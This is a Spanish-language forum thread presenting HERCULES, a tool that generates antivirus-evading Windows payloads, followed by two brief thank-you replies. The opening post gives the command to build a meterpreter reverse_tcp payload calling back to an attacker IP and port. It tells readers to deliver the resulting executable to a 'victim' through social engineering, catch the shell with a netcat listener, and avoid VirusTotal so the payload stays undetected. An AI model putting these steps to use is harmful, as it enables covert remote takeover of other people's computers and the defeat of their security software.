HERCULES: Genera un payload y evade los antivirus

Iniciado por afravaz, Septiembre 09, 2016, 12:15:34 PM

Tema anterior - Siguiente tema

0 Miembros y 1 Visitante están viendo este tema.

Septiembre 09, 2016, 12:15:34 PM Ultima modificación: Septiembre 12, 2016, 10:51:17 AM por afravaz

Definición:

Hercules es una herramienta cuyo proposito es generar un payload fud (Fully Undetectable) que evade antivirus.

Antes de nada:

*POR FAVOR NO SUBAIS EL PAYLOAD A VIRUSTOTAL!, porque dejaría de ser FUD.

Tutorial:

Código: php
./HERCULES_x64 192.168.1.20 4444 –p windows/meterpreter/reverse_tcp –a x64 –l dynamic
"./HERCULES_x64 [IP LOCAL] [PUERTO] –p [PAYLOAD] –a [ARQUITECTURA] –l [LINKER]"

Se nos guardará un payload que tendrá el nombre de Payload.exe el cual enviaremos a nuestra victima mediante cualquier técnica de ingeniería social.
Crearemos un listener TCP con NetCat escribiendo el comando:
Código: php
nc –l –p [PUERTO]

+ Cabe destacar que también podremos poner un listenner de metasploit y ganar así una sesión meterpreter.
*NetCat: Es una herramienta de red que permite a través de intérprete de comandos y con una sintaxis sencilla abrir puertos TCP/UDP en un HOST (quedando netcat a la escucha), asociar una shell a un puerto en concreto (para conectarse por ejemplo a MS-DOS o al intérprete bash de Linux remotamente) y forzar conexiones UDP/TCP (útil por ejemplo para realizar rastreos de puertos o realizar transferencias de archivos bit a bit entre dos equipos).

Ratio de detección:


Descarga:

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Vídeo:
elcandadoinformatico. Tú blog sobre Seguridad Informática en español.

Excelente aporte, lo probaré en mi lab.. y ver q pinta, gracias

Enviado desde mi XT1058 mediante Tapatalk


Muy bueno! No conocía este tipo de herramientas.

Gracias
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta